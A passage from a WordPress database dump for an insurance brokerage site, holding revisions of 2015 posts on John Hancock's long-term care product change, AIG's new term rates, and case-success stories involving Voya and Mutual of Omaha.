announced in the near future.</li>\r\n <li>Please see the formal announcement from John Hancock for additional details.</li>\r\n</ul>','ProdMod: John Hancock is Discontinuing Sale of NY Partnership Custom Care III LTC Product','','inherit','open','open','','277-revision-v1','','','2015-02-23 01:55:58','2015-02-23 01:55:58','',277,'http://www.empireins.com/277-revision-v1/',0,'revision','',0),(280,1,'2015-02-23 01:57:35','2015-02-23 01:57:35','','formal announcement from John Hancock','','inherit','open','open','','ltcnewslink_nyp_disc','','','2015-02-23 01:57:35','2015-02-23 01:57:35','',277,'http://www.empireins.com/wp-content/uploads/2015/02/LTCNewslink_NYP_Disc.pdf',0,'attachment','application/pdf',0),(281,1,'2015-02-23 01:57:44','2015-02-23 01:57:44','Change is coming in the John Hancock Long-Term Care Portfolio. Effective April 27, 2015, they will no longer offer the New York Partnership Custom Care III. Read on for the transition rules, as well as a reminder of the LTC products that remain for sale in New York, including the LTC Rider available on many of their life insurance policies.\r\n\r\n<hr />\r\n\r\n<h2>John Hancock to Discontinue the Sale of its New York Partnership LTCI Product</h2>\r\nFrom John Hancock:\r\n<p style=\"padding-left: 30px;\"><em>John Hancock regularly monitors our long-term care insurance product portfolio to ensure that it continues to meet the needs of our customers and distributors. After a thorough analysis of our</em></p>\r\n<p style=\"padding-left: 30px;\"><em>New York long-term care insurance business, we have made the difficult decision to discontinue sales of our New York Partnership individual long-term care insurance policies (Policy Forms: LTC-11 NYP and LTC-11 SGNYP) effective April 27th, 2015. Our LTC product portfolio is moving in a different direction than New York Partnership product requirements allow.</em></p>\r\n<p style=\"padding-left: 30px;\"><em>We will continue to market our non-Partnership product, Custom Care III featuring Benefit Builder (Policy Forms LTC-11 NY and SG-11 NY), in New York. We commend and appreciate the dedication, work and advocacy of the New York Partnership staff as it relates to New York Partnership policyholders. We also remain committed to working with the New York Partnership and industry on matters that are important to our policyholders.</em></p>\r\n<strong>Transition Rules:</strong>\r\n<ul>\r\n <li>All individual long-term care insurance applications for New York Partnership policies must be signed by April 27th, 2015 and received in the Home Office by May 4th, 2015.</li>\r\n <li>Any New York Partnership applications received after May 4th, 2015 will not be processed.</li>\r\n</ul>\r\n<strong>Important:</strong>\r\n<ul>\r\n <li>These changes have no impact on existing, in force NY Partnership policies.</li>\r\n <li>There is no change to the LTC Rider available on many John Hancock Life Insurance policies at this time.</li>\r\n <li>Expect a new LTC product from John Hancock to be announced in the near future.</li>\r\n <li>Please see the <a href=\"http://www.empireins.com/wp-content/uploads/2015/02/LTCNewslink_NYP_Disc.pdf\">formal announcement from John Hancock</a> for additional details.</li>\r\n</ul>','ProdMod: John Hancock is Discontinuing Sale of NY Partnership Custom Care III LTC Product','','inherit','open','open','','277-revision-v1','','','2015-02-23 01:57:44','2015-02-23 01:57:44','',277,'http://www.empireins.com/277-revision-v1/',0,'revision','',0),(282,1,'2015-02-23 01:58:39','2015-02-23 01:58:39','Change is coming in the John Hancock Long-Term Care Portfolio. Effective April 27, 2015, they will no longer offer the New York Partnership Custom Care III. Read on for the transition rules, as well as a reminder of the LTC products that remain for sale in New York, including the LTC Rider available on many of their life insurance policies.\r\n\r\n<hr />\r\n\r\n<h2>John Hancock to Discontinue the Sale of its New York Partnership LTCI Product</h2>\r\nFrom John Hancock:\r\n<p style=\"padding-left: 30px;\"><em>John Hancock regularly monitors our long-term care insurance product portfolio to ensure that it continues to meet the needs of our customers and distributors. After a thorough analysis of our</em></p>\r\n<p style=\"padding-left: 30px;\"><em>New York long-term care insurance business, we have made the difficult decision to discontinue sales of our New York Partnership individual long-term care insurance policies (Policy Forms: LTC-11 NYP and LTC-11 SGNYP) effective April 27th, 2015. Our LTC product portfolio is moving in a different direction than New York Partnership product requirements allow.</em></p>\r\n<p style=\"padding-left: 30px;\"><em>We will continue to market our non-Partnership product, Custom Care III featuring Benefit Builder (Policy Forms LTC-11 NY and SG-11 NY), in New York. We commend and appreciate the dedication, work and advocacy of the New York Partnership staff as it relates to New York Partnership policyholders. We also remain committed to working with the New York Partnership and industry on matters that are important to our policyholders.</em></p>\r\n<strong>Transition Rules:</strong>\r\n<ul>\r\n <li>All individual long-term care insurance applications for New York Partnership policies must be signed by April 27th, 2015 and received in the Home Office by May 4th, 2015.</li>\r\n <li>Any New York Partnership applications received after May 4th, 2015 will not be processed.</li>\r\n</ul>\r\n<strong>Important:</strong>\r\n<ul>\r\n <li>These changes have no impact on existing, in force NY Partnership policies.</li>\r\n <li>There is no change to the LTC Rider available on many John Hancock Life Insurance policies at this time.</li>\r\n <li>Expect a new LTC product from John Hancock to be announced in the near future.</li>\r\n <li>Please see the <a href=\"http://www.empireins.com/wp-content/uploads/2015/02/LTCNewslink_NYP_Disc.pdf\" target=\"_blank\">formal announcement from John Hancock</a> for additional details.</li>\r\n</ul>','ProdMod: John Hancock is Discontinuing Sale of NY Partnership Custom Care III LTC Product','','inherit','open','open','','277-revision-v1','','','2015-02-23 01:58:39','2015-02-23 01:58:39','',277,'http://www.empireins.com/277-revision-v1/',0,'revision','',0),(283,1,'2015-02-12 14:48:59','2015-02-12 14:48:59','<p style=\"text-align: justify;\">2015 is shaping up to be another “Term War” and AIG has pulled out the big guns: Lower premiums, re-entering the New York market and their continued dominance of the rated term market. If you are looking for a great way to compete for term cases and expand into new markets, AIG is going to be a great partner in 2015.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h3>AIG Releases New Term Rates and Re-enters New York!</h3>\r\nEffective Monday, February 09, 2015, AIG is pleased to announce significant, competitive improvements nationwide on AG Select-a-Term. AIG ranks in the top three in the industry in nearly 75% of cells, with nearly 30% of their premium rates ranking number one. Plus, AIG has re-entered the New York term market with the same low rates. In the New York term market, nearly 90% of the time, AIG ranks in the top 3, and almost half of the time, AIG ranks number one.\r\n\r\n<strong>Changes:</strong>\r\n<ul>\r\n <li>Significant competitive improvements</li>\r\n <li>Approximately 30% of pricing cells changed:</li>\r\n <li>25% of the cells had a price decrease</li>\r\n <li>Decreases ranged from 0.1% to 25%; approximately 4% reduction on average</li>\r\n <li>Standard Nontobaco class comprised nearly half of the cells with a rate reduction</li>\r\n <li>Less than 7% of cells had an increase; approximately 5% increase on average</li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/02/AGLC106514REV0215_SAT_RateFlyer_FILLX.pdf\">Follow this link</a> to see how much prices have dropped versus the prior version of Select-A-Term</li>\r\n <li>Even more important, <a href=\"http://www.empireins.com/wp-content/uploads/2015/02/AGLC104824_REV0215_SaT_RepriceComparison_2FILLX.pdf\" target=\"_blank\">follow this link</a> to see how the new pricing stacks up versus the competition</li>\r\n</ul>\r\n<strong>Transition Rules:</strong>\r\n<ul>\r\n <li>New rates will be issued automatically between Feb 9 – March 23 unless old premiums are specifically requested. The system will not provide them with the better rate. It needs to be specifically requested. After the transition period ends 3/23, then only new rates will be issued.</li>\r\n <li>New AG Select-a-Term rates will be available February 9, 2015.</li>\r\n <li>Applications received prior to February 9, 2015 will automatically receive old premium rates.</li>\r\n <li>Applications received February 9, 2015 but prior to March 23, 2015 will automatically receive new rates unless old premium rates are specifically requested.</li>\r\n <li>Applications received March 23, 2015 or later will automatically receive the new rates.</li>\r\n <li>Reissue requests to the new rates will not be honored.</li>\r\n <li>New applications submitted to replace existing inforce coverage with the new rates will not be honored within 90 days of the existing coverage going inforce.</li>\r\n <li><a href=\"https://estationsecure.americangeneral.com/SharedFilePile/Bulletins/2015Bulletins/14_063_SaT_Feb_2015\" target=\"_blank\">Follow this link for the official bulletin from AIG</a>.</li>\r\n</ul>\r\n<strong>Rated Cases:</strong>\r\n\r\nFor years, AIG has handled rated term cases better than just about every other carrier out there. Rather than base their ratings on their Standard class, they used a special class that offered significant savings versus Standard Rates. The end result is pricing on rated cases that is some of the lowest in the industry. The best news? That pricing strategy continues with this re-price, including New York, giving us all yet another reason to direct term business to AIG. For more information on ratings and how AIG’s pricing stacks up, <a href=\"http://www.empireins.com/wp-content/uploads/2015/02/AGLC103795_REV0215_SAT_RatedTerm_FILLX.pdf\" target=\"_blank\">follow this link</a>.','AIG Releases New Term Rates and Re-enters NY!','','publish','open','open','','aig-releases-new-term-rates-and-re-enters-ny','','','2015-12-13 18:48:54','2015-12-13 18:48:54','',0,'http://www.empireins.com/?p=283',0,'post','',0),(284,1,'2015-02-23 02:02:18','2015-02-23 02:02:18','','follow this link','','inherit','open','open','','aglc103795_rev0215_sat_ratedterm_fillx','','','2015-02-23 02:02:18','2015-02-23 02:02:18','',283,'http://www.empireins.com/wp-content/uploads/2015/02/AGLC103795_REV0215_SAT_RatedTerm_FILLX.pdf',0,'attachment','application/pdf',0),(285,1,'2015-02-23 02:03:13','2015-02-23 02:03:13','','Follow this link','','inherit','open','open','','aglc106514rev0215_sat_rateflyer_fillx','','','2015-02-23 02:03:13','2015-02-23 02:03:13','',283,'http://www.empireins.com/wp-content/uploads/2015/02/AGLC106514REV0215_SAT_RateFlyer_FILLX.pdf',0,'attachment','application/pdf',0),(286,1,'2015-02-23 02:03:43','2015-02-23 02:03:43','','follow this link','','inherit','open','open','','aglc104824_rev0215_sat_repricecomparison_2fillx','','','2015-02-23 02:03:43','2015-02-23 02:03:43','',283,'http://www.empireins.com/wp-content/uploads/2015/02/AGLC104824_REV0215_SaT_RepriceComparison_2FILLX.pdf',0,'attachment','application/pdf',0),(287,1,'2015-02-23 02:04:01','2015-02-23 02:04:01','2015 is shaping up to be another “Term War” and AIG has pulled out the big guns: Lower premiums, re-entering the New York market and their continued dominance of the rated term market. If you are looking for a great way to compete for term cases and expand into new markets, AIG is going to be a great partner in 2015.\r\n\r\n<hr />\r\n\r\n<h3>AIG Releases New Term Rates and Re-enters New York!</h3>\r\nEffective Monday, February 09, 2015, AIG is pleased to announce significant, competitive improvements nationwide on AG Select-a-Term. AIG ranks in the top three in the industry in nearly 75% of cells, with nearly 30% of their premium rates ranking number one. Plus, AIG has re-entered the New York term market with the same low rates. In the New York term market, nearly 90% of the time, AIG ranks in the top 3, and almost half of the time, AIG ranks number one.\r\n\r\n<strong>Changes:</strong>\r\n<ul>\r\n <li>Significant competitive improvements</li>\r\n <li>Approximately 30% of pricing cells changed:</li>\r\n <li>25% of the cells had a price decrease</li>\r\n <li>Decreases ranged from 0.1% to 25%; approximately 4% reduction on average</li>\r\n <li>Standard Nontobaco class comprised nearly half of the cells with a rate reduction</li>\r\n <li>Less than 7% of cells had an increase; approximately 5% increase on average</li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/02/AGLC106514REV0215_SAT_RateFlyer_FILLX.pdf\">Follow this link</a> to see how much prices have dropped versus the prior version of Select-A-Term</li>\r\n <li>Even more important, <a href=\"http://www.empireins.com/wp-content/uploads/2015/02/AGLC104824_REV0215_SaT_RepriceComparison_2FILLX.pdf\" target=\"_blank\">follow this link</a> to see how the new pricing stacks up versus the competition</li>\r\n</ul>\r\n<strong>Transition Rules:</strong>\r\n<ul>\r\n <li>New rates will be issued automatically between Feb 9 – March 23 unless old premiums are specifically requested. The system will not provide them with the better rate. It needs to be specifically requested. After the transition period ends 3/23, then only new rates will be issued.</li>\r\n <li>New AG Select-a-Term rates will be available February 9, 2015.</li>\r\n <li>Applications received prior to February 9, 2015 will automatically receive old premium rates.</li>\r\n <li>Applications received February 9, 2015 but prior to March 23, 2015 will automatically receive new rates unless old premium rates are specifically requested.</li>\r\n <li>Applications received March 23, 2015 or later will automatically receive the new rates.</li>\r\n <li>Reissue requests to the new rates will not be honored.</li>\r\n <li>New applications submitted to replace existing inforce coverage with the new rates will not be honored within 90 days of the existing coverage going inforce.</li>\r\n <li><a href=\"https://estationsecure.americangeneral.com/SharedFilePile/Bulletins/2015Bulletins/14_063_SaT_Feb_2015\" target=\"_blank\">Follow this link for the official bulletin from AIG</a>.</li>\r\n</ul>\r\n<strong>Rated Cases:</strong>\r\n\r\nFor years, AIG has handled rated term cases better than just about every other carrier out there. Rather than base their ratings on their Standard class, they used a special class that offered significant savings versus Standard Rates. The end result is pricing on rated cases that is some of the lowest in the industry. The best news? That pricing strategy continues with this re-price, including New York, giving us all yet another reason to direct term business to AIG. For more information on ratings and how AIG’s pricing stacks up, <a href=\"http://www.empireins.com/wp-content/uploads/2015/02/AGLC103795_REV0215_SAT_RatedTerm_FILLX.pdf\" target=\"_blank\">follow this link</a>.','AIG Releases New Term Rates and Re-enters NY!','','inherit','open','open','','283-revision-v1','','','2015-02-23 02:04:01','2015-02-23 02:04:01','',283,'http://www.empireins.com/283-revision-v1/',0,'revision','',0),(288,1,'2015-02-18 08:30:55','2015-02-18 08:30:55','<header class=\"entry-header\">\r\n<p class=\"entry-title\" style=\"font-weight: 500; color: #555555; text-align: justify;\"><strong>Experience matters. In this case, it led to the recognition of the subtle differences between operational protocols on an aviation case. The result? A win for the AIN Member and Voya to the tune of $219K in Target Premium, unlocked by the Voya Underwriter’s experience and relationships.</strong></p>\r\n\r\n</header>\r\n<div class=\"entry-content\">\r\n\r\n<hr />\r\n\r\n<h4 style=\"font-weight: 500;\"><strong>AT A GLANCE:</strong></h4>\r\n<h4 style=\"font-weight: 500;\">Underwriting: Aviation\r\nTarget: $218,908</h4>\r\n<h4 style=\"font-weight: 500;\">Situation:</h4>\r\n<ul>\r\n <li>A 60-year-old male was looking for $5MM of estate planning coverage and $3MM of Business Succession coverage.</li>\r\n <li>The insured applied at several insurance companies and had received flat extras due to his well documented business aviation activities.</li>\r\n</ul>\r\n<h4 style=\"font-weight: 500;\">Solution:</h4>\r\n<ul>\r\n <li>The Voya Financial Underwriting Team</li>\r\n</ul>\r\n<h4 style=\"font-weight: 500;\">Results:</h4>\r\n<ul>\r\n <li>The producer reached out to EIB for assistance as they could not sell a policy with a flat extra.</li>\r\n <li>Upon receipt of the aviation supplement, EIB had several questions to get more clarity on his aviation activities.</li>\r\n <li>Fortunately, we were able to uncover several favorable elements of his aviation activities, including: Typical aviation cases involve planes that are maintained under Part 91 – General Operating and Flight Rules versus Part 135 – Operating Requirements: Commuter and On Demand Operations – which is significantly more stringent.\r\n<ul>\r\n <li>He only flies within the US</li>\r\n <li>The type of jet that he flies</li>\r\n <li>The fact that he flies for business with a co-pilot, a retired Delta Pilot.</li>\r\n <li>The fact that he owns the plane but leases it back to a charter company.</li>\r\n <li>The charter company then provides daily maintenance on the plane as part of their agreement that is “Part 135 Certified”.</li>\r\n</ul>\r\n</li>\r\n <li>Upon receiving the additional information EIB called their underwriter at Voya, as the Voya product could satisfy the insurance needs of the client.</li>\r\n <li>Voya had an internal guideline of a $.48 flat extra, but were confident they could get the reinsurers on board with no flat extra.</li>\r\n <li>Through their contacts Voya was able to negotiate a Standard offer with no flat extra through the reinsurers.</li>\r\n <li>Voya’s reinsurance relationships allowed Voya to win the case and $218,908 in target premium.</li>\r\n</ul>\r\n\r\n<hr />\r\n<p class=\"entry-content\" style=\"text-align: center;\"><strong><em>Real Clients. Real Cases. Real Success.</em></strong></p>\r\n\r\n</div>','Case Success: Voya Turns Aviation Case into the “Friendly Skies” for $218K of Target','','publish','open','open','','case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target','','','2016-01-06 11:20:26','2016-01-06 11:20:26','',0,'http://www.empireins.com/?p=288',0,'post','',0),(289,1,'2015-02-23 02:09:01','2015-02-23 02:09:01','<header class=\"entry-header\">\r\n<p class=\"entry-title\" style=\"font-weight: 500; color: #555555;\">Experience matters. In this case, it led to the recognition of the subtle differences between operational protocols on an aviation case. The result? A win for the AIN Member and Voya to the tune of $219K in Target Premium, unlocked by the Voya Underwriter’s experience and relationships.</p>\r\n\r\n</header>\r\n<div class=\"entry-content\">\r\n\r\n<hr />\r\n<p style=\"font-weight: 500;\"><strong>AT A GLANCE:</strong></p>\r\n<p style=\"font-weight: 500;\">Underwriting: Aviation\r\nTarget: $218,908</p>\r\n<p style=\"font-weight: 500;\">Situation:</p>\r\n\r\n<ul>\r\n <li>A 60-year-old male was looking for $5MM of estate planning coverage and $3MM of Business Succession coverage.</li>\r\n <li>The insured applied at several insurance companies and had received flat extras due to his well documented business aviation activities.</li>\r\n</ul>\r\n<p style=\"font-weight: 500;\">Solution:</p>\r\n\r\n<ul>\r\n <li>The Voya Financial Underwriting Team</li>\r\n</ul>\r\n<p style=\"font-weight: 500;\">Results:</p>\r\n\r\n<ul>\r\n <li>The producer reached out to EIB for assistance as they could not sell a policy with a flat extra.</li>\r\n <li>Upon receipt of the aviation supplement, EIB had several questions to get more clarity on his aviation activities.</li>\r\n <li>Fortunately, we were able to uncover several favorable elements of his aviation activities, including: Typical aviation cases involve planes that are maintained under Part 91 – General Operating and Flight Rules versus Part 135 – Operating Requirements: Commuter and On Demand Operations – which is significantly more stringent.\r\n<ul>\r\n <li>He only flies within the US</li>\r\n <li>The type of jet that he flies</li>\r\n <li>The fact that he flies for business with a co-pilot, a retired Delta Pilot.</li>\r\n <li>The fact that he owns the plane but leases it back to a charter company.</li>\r\n <li>The charter company then provides daily maintenance on the plane as part of their agreement that is “Part 135 Certified”.</li>\r\n</ul>\r\n</li>\r\n <li>Upon receiving the additional information EIB called their underwriter at Voya, as the Voya product could satisfy the insurance needs of the client.</li>\r\n <li>Voya had an internal guideline of a $.48 flat extra, but were confident they could get the reinsurers on board with no flat extra.</li>\r\n <li>Through their contacts Voya was able to negotiate a Standard offer with no flat extra through the reinsurers.</li>\r\n <li>Voya’s reinsurance relationships allowed Voya to win the case and $218,908 in target premium.</li>\r\n</ul>\r\n\r\n<hr />\r\n<p class=\"entry-content\" style=\"text-align: center;\"><strong><em>Real Clients. Real Cases. Real Success.</em></strong></p>\r\n\r\n</div>','Case Success: Voya Turns Aviation Case into the “Friendly Skies” for $218K of Target','','inherit','open','open','','288-revision-v1','','','2015-02-23 02:09:01','2015-02-23 02:09:01','',288,'http://www.empireins.com/288-revision-v1/',0,'revision','',0),(290,1,'2015-01-22 14:52:51','2015-01-22 14:52:51','<div class=\"entry-content\">\r\n<p style=\"text-align: justify;\"><strong>Companion’s Chronic Illness Rider, available at ALL underwriting classes, is a natural fit for clients who can’t qualify for traditional Long-Term Care insurance coverage based on a few dings and dents in their health history. In this Case Success Story, Companion Life earns $77K of Target Premium using this unique element of their Chronic Illness Rider.\r\n</strong></p>\r\n\r\n\r\n<hr />\r\n\r\n<h2 style=\"font-weight: 500;\"><strong>AT A GLANCE:</strong></h2>\r\n<h4 style=\"font-weight: 500;\">Product: GUL with Chronic Illness ABR\r\nTarget: $77,454</h4>\r\n<h4 style=\"font-weight: 500;\">Situation:</h4>\r\n<ul>\r\n <li>An EIB Producer had a female client, age 63, with a life insurance need of $5MM.</li>\r\n <li>The client was also seeking Long-Term Care coverage in addition to the death benefit.</li>\r\n <li>Unfortunately, the client had been declined for the LTC coverage based on the morbidity underwriting that accompanies Long-Term Care Riders.</li>\r\n</ul>\r\n<h4 style=\"font-weight: 500;\">Solution:</h4>\r\n<ul>\r\n <li>Companion Life GUL with Chronic Illness ABR</li>\r\n</ul>\r\n<h4 style=\"font-weight: 500;\">Results:</h4>\r\n<ul>\r\n <li>EIB illustrated the Companion Life GUL with a level pay design guaranteeing the death benefit out to age 120.</li>\r\n <li>Companion\'s GUL automatically includes the Accelerated Death Benefit riders at no additional cost and no table rating restrictions.</li>\r\n <li>The client can now enjoy the ADB rider coverage even though she was not approved for Long-Term Care coverage with other carriers.</li>\r\n <li>Companion allows acceleration of up to $1MM of coverage, one of the highest total benefit amounts in the industry.</li>\r\n <li>Companion’s acceleration cap of 80% of face amount is also one of the highest in the industry for this type of rider.</li>\r\n <li>$77,454 of target placed with Companion Life</li>\r\n</ul>\r\n<div class=\"entry-content\">\r\n\r\n<hr />\r\n\r\n</div>\r\n<div class=\"entry-content\" style=\"text-align: center;\"><strong><em>Real Clients. Real Cases. Real Success.</em></strong></div>\r\n</div>','Case Success: Companion Life Chronic Illness Rider Saves LTC Decline','','publish','open','open','','case-success-companion-life-chronic-illness-rider-saves-ltc-decline','','','2015-12-13 18:48:54','2015-12-13 18:48:54','',0,'http://www.empireins.com/?p=290',0,'post','',0),(291,1,'2015-02-23 02:10:12','2015-02-23 02:10:12','<div class=\"entry-content\">\r\n\r\n<strong>Mutual’s Chronic Illness Rider, available at ALL underwriting classes, is a natural fit for clients who can’t qualify for traditional Long-Term Care insurance coverage based on a few dings and dents in their health history. In this Case Success Story, Mutual of Omaha earns $77K of Target Premium using this unique element of their Chronic Illness Rider.\r\n</strong>\r\n\r\n<hr />\r\n\r\n<h2 style=\"font-weight: 500;\"><strong>AT A GLANCE:</strong></h2>\r\n<h4 style=\"font-weight: 500;\">Product: GUL with Chronic Illness ABR\r\nTarget: $77,454</h4>\r\n<h4 style=\"font-weight: 500;\">Situation:</h4>\r\n<ul>\r\n <li>An AIN Member Firm has a female client, age 63, with a life insurance need of $5MM.</li>\r\n <li>The client was also seeking Long-Term Care coverage in addition to the death benefit.</li>\r\n <li>Unfortunately, the client had been declined for the LTC coverage based on the morbidity underwriting that accompanies Long-Term Care Riders.</li>\r\n</ul>\r\n<h4 style=\"font-weight: 500;\">Solution:</h4>\r\n<ul>\r\n <li>Mutual of Omaha GUL with Chronic Illness ABR</li>\r\n</ul>\r\n<h4 style=\"font-weight: 500;\">Results:</h4>\r\n<ul>\r\n <li>The AIN Member Firm illustrated the Mutual of Omaha GUL with a level pay design guaranteeing the death benefit out to age 120.</li>\r\n <li>Mutual of Omaha GUL automatically includes the Accelerated Death Benefit riders at no additional cost and no table rating restrictions.</li>\r\n <li>The client can now enjoy the ADB rider coverage even though she was not approved for Long-Term Care coverage with other carriers.</li>\r\n <li>Mutual of Omaha allows acceleration of up to $1MM of coverage, one of the highest total benefit amounts in the industry.</li>\r\n <li>Mutual of Omaha’s acceleration cap of 80% of face amount is also one of the highest in the industry for this type of rider.</li>\r\n <li>$77,454 of target placed with Mutual of Omaha</li>\r\n</ul>\r\n<div class=\"entry-content\">\r\n\r\n<hr />\r\n\r\n</div>\r\n<div class=\"entry-content\"><strong><em>Real AIN Members. Real Cases. Real Success.</em></strong></div>\r\n</div>','Case Success: Mutual of Omaha Chronic Illness Rider Saves LTC Decline','','inherit','open','open','','290-revision-v1','','','2015-02-23 02:10:12','2015-02-23 02:10:12','',290,'http://www.empireins.com/290-revision-v1/',0,'revision','',0),(292,1,'2015-02-23 02:11:57','2015-02-23 02:11:57','<header class=\"entry-header\">\r\n<p class=\"entry-title\" style=\"font-weight: 500; color: #555555;\"><strong>Experience matters. In this case, it led to the recognition of the subtle differences between operational protocols on an aviation case. The result? A win for the AIN Member and Voya to the tune of $219K in Target Premium, unlocked by the Voya Underwriter’s experience and relationships.</strong></p>\r\n\r\n</header>\r\n<div class=\"entry-content\">\r\n\r\n<hr />\r\n\r\n<h4 style=\"font-weight: 500;\"><strong>AT A GLANCE:</strong></h4>\r\n<h4 style=\"font-weight: 500;\">Underwriting: Aviation\r\nTarget: $218,908</h4>\r\n<h4 style=\"font-weight: 500;\">Situation:</h4>\r\n<ul>\r\n <li>A 60-year-old male was looking for $5MM of estate planning coverage and $3MM of Business Succession coverage.</li>\r\n <li>The insured applied at several insurance companies and had received flat extras due to his well documented business aviation activities.</li>\r\n</ul>\r\n<h4 style=\"font-weight: 500;\">Solution:</h4>\r\n<ul>\r\n <li>The Voya Financial Underwriting Team</li>\r\n</ul>\r\n<h4 style=\"font-weight: 500;\">Results:</h4>\r\n<ul>\r\n <li>The producer reached out to EIB for assistance as they could not sell a policy with a flat extra.</li>\r\n <li>Upon receipt of the aviation supplement, EIB had several questions to get more clarity on his aviation activities.</li>\r\n <li>Fortunately, we were able to uncover several favorable elements of his aviation activities, including: Typical aviation cases involve planes that are maintained under Part 91 – General Operating and Flight Rules versus Part 135 – Operating Requirements: Commuter and On Demand Operations – which is significantly more stringent.\r\n<ul>\r\n <li>He only flies within the US</li>\r\n <li>The type of jet that he flies</li>\r\n <li>The fact that he flies for business with a co-pilot, a retired Delta Pilot.</li>\r\n <li>The fact that he owns the plane but leases it back to a charter company.</li>\r\n <li>The charter company then provides daily maintenance on the plane as part of their agreement that is “Part 135 Certified”.</li>\r\n</ul>\r\n</li>\r\n <li>Upon receiving the additional information EIB called their underwriter at Voya, as the Voya product could satisfy the insurance needs of the client.</li>\r\n <li>Voya had an internal guideline of a $.48 flat extra, but were confident they could get the reinsurers on board with no flat extra.</li>\r\n <li>Through their contacts Voya was able to negotiate a Standard offer with no flat extra through the reinsurers.</li>\r\n <li>Voya’s reinsurance relationships allowed Voya to win the case and $218,908 in target premium.</li>\r\n</ul>\r\n\r\n<hr />\r\n<p class=\"entry-content\" style=\"text-align: center;\"><strong><em>Real Clients. Real Cases. Real Success.</em></strong></p>\r\n\r\n</div>','Case Success: Voya Turns Aviation Case into the “Friendly Skies” for $218K of Target','','inherit','open','open','','288-revision-v1','','','2015-02-23 02:11:57','2015-02-23 02:11:57','',288,'http://www.empireins.com/288-revision-v1/',0,'revision','',0),(293,1,'2015-02-23 02:13:14','2015-02-23 02:13:14','<div class=\"entry-content\">\r\n\r\n<strong>Mutual’s Chronic Illness Rider, available at ALL underwriting classes, is a natural fit for clients who can’t qualify for traditional Long-Term Care insurance coverage based on a few dings and dents in their health history. In this Case Success Story, Mutual of Omaha earns $77K of Target Premium using this unique element of their Chronic Illness Rider.\r\n</strong>\r\n\r\n<hr />\r\n\r\n<h2 style=\"font-weight: 500;\"><strong>AT A GLANCE:</strong></h2>\r\n<h4 style=\"font-weight: 500;\">Product: GUL with Chronic Illness ABR\r\nTarget: $77,454</h4>\r\n<h4 style=\"font-weight: 500;\">Situation:</h4>\r\n<ul>\r\n <li>An EIG Producer had a female client, age 63, with a life insurance need of $5MM.</li>\r\n <li>The client was also seeking Long-Term Care coverage in addition to the death benefit.</li>\r\n <li>Unfortunately, the client had been declined for the LTC coverage based on the morbidity underwriting that accompanies Long-Term Care Riders.</li>\r\n</ul>\r\n<h4 style=\"font-weight: 500;\">Solution:</h4>\r\n<ul>\r\n <li>Mutual of Omaha GUL with Chronic Illness ABR</li>\r\n</ul>\r\n<h4 style=\"font-weight: 500;\">Results:</h4>\r\n<ul>\r\n <li>EIB illustrated the Mutual of Omaha GUL with a level pay design guaranteeing the death benefit out to age 120.</li>\r\n <li>Mutual of Omaha GUL automatically includes the Accelerated Death Benefit riders at no additional cost and no table rating restrictions.</li>\r\n <li>The client can now enjoy the ADB rider coverage even though she was not approved for Long-Term Care coverage with other carriers.</li>\r\n <li>Mutual of Omaha allows acceleration of up to $1MM of coverage, one of the highest total benefit amounts in the industry.</li>\r\n <li>Mutual of Omaha’s acceleration cap of 80% of face amount is also one of the highest in the industry for this type of rider.</li>\r\n <li>$77,454 of target placed with Mutual of Omaha</li>\r\n</ul>\r\n<div class=\"entry-content\">\r\n\r\n<hr />\r\n\r\n</div>\r\n<div class=\"entry-content\" style=\"text-align: center;\"><strong><em>Real Clients. Real Cases. Real Success.</em></strong></div>\r\n</div>','Case Success: Mutual of Omaha Chronic Illness Rider Saves LTC Decline','','inherit','open','open','','290-revision-v1','','','2015-02-23 02:13:14','2015-02-23 02:13:14','',290,'http://www.empireins.com/290-revision-v1/',0,'revision','',0),(295,1,'2015-07-25 15:50:39','2015-07-25 15:50:39','<code><div class=\"page-post-sub-content\">As the industry leader in insurance brokerage, we take great pride in providing brokers with the ultimate products needed to exceed their clients’ expectations. With EIB’s renowned attention to detail, and extensive resources you can be confident you will receive the very best policy package for each and every one of your clients. By joining EIB you reap the benefits of our extensive experience and the strong relationships we have built with all major carriers and underwriters.</div>\n<div class=\"page-post-sub-content\"></div>\n<div class=\"page-post-sub-content\">As an EIB broker, you will have access to the very latest developments in the industry by way of our constant research; whether it is the hottest products, latest news, or most competitive prices in the insurance field. Furthermore, you can follow your policy as it gets approved and issued, by visiting your customized portal on our website.</div>\n<div class=\"page-post-sub-content\"></div>\n<div class=\"page-post-sub-content\">Please feel free to contact us via email or give us a call at 718.218.9647.</div>\n<div class=\"page-post-sub-content\"></div>\n<div class=\"page-post-sub-content\">It is a privilege to have you here. …Welcome…</div>\n<div class=\"page-post-sub-content\"></div>\n<div class=\"page-post-sub-content\">David Braver CEO & President</div>','about us','','inherit','open','open','','9-autosave-v1','','','2015-07-25 15:50:39','2015-07-25 15:50:39','',9,'http://www.empireins.com/9-autosave-v1/',0,'revision','',0),(296,1,'2015-04-05 15:35:20','2015-04-05 15:35:20','<h1>Welcome to EIB, where Life Solutions are Beyond Expectations!</h1>\r\n<div class=\"page-post-sub-content\">As the industry leader in insurance brokerage, we take great pride in providing brokers with the ultimate products needed to exceed their clients’ expectations. With EIB’s renowned attention to detail, and extensive resources you can be confident you will receive the very best policy package for each and every one of your clients. By joining EIB you reap the benefits of our extensive experience and the strong relationships we have built with all major carriers and underwriters.</div>\r\n<div class=\"page-post-sub-content\"></div>\r\n<div class=\"page-post-sub-content\">As an EIB broker, you will have access to the very latest developments in the industry by way of our constant research; whether it is the hottest products, latest news, or most competitive prices in the insurance field. Furthermore, you can follow your policy as it gets approved and issued, by visiting your customized portal on our website.</div>\r\n<div class=\"page-post-sub-content\"></div>\r\n<div class=\"page-post-sub-content\">Please feel free to contact us via email or give us a call at 718.218.9647.</div>\r\n<div class=\"page-post-sub-content\"></div>\r\n<div class=\"page-post-sub-content\">It is a privilege to have you here. …Welcome…</div>\r\n<div class=\"page-post-sub-content\"></div>\r\n<div class=\"page-post-sub-content\">David Braver CEO & President</div>','about us','','inherit','open','open','','9-revision-v1','','','2015-04-05 15:35:20','2015-04-05 15:35:20','',9,'http://www.empireins.com/9-revision-v1/',0,'revision','',0),(303,1,'2015-06-23 15:51:51','2015-06-23 15:51:51','[sso-broker-gear] ','Case Status','','publish','open','open','','case-status','','','2015-06-23 15:52:13','2015-06-23 15:52:13','',0,'http://www.empireins.com/?page_id=303',0,'page','',0),(304,1,'2015-06-23 